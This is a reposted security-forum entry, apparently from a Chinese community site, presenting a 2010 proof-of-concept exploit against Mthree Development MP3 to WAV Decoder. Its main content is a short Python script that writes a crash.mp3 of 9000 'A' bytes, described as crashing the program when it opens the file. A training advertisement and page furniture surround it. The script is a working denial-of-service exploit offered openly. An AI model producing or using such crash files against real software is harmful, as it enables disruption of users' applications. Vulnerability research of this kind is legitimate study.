首页
社区
课程
招聘
[转帖]Mthree Development MP3 to WAV Decoder Denial of Service Vulnerability
2010-8-11 12:17 3245

[转帖]Mthree Development MP3 to WAV Decoder Denial of Service Vulnerability

2010-8-11 12:17
3245
# Exploit Title: Mthree Development MP3 to WAV Decoder (.mp3) DoS  

# Date: 10 / 8 / 2010  

# Author: Oh Yaw Theng  

# Credit : ZAC003(4m!n)   

# Software Link: http://www.mthreedev.com/setupmp3towav.exe  

# Tested on: Windows XP SP 2  

# CVE : N / A  

# Description : Create the malicious .mp3 file , open up using Mthree , after that double click on the file .. Boom ! DEADBEEF !  

   

#!/usr/bin/python  

   

filename = "crash.mp3"

   

junk = "\x41" * 9000

   

exploit = junk  

   

textfile = open(filename,'w')  

textfile.write(exploit)  

textfile.close()

[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。

收藏
点赞0
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回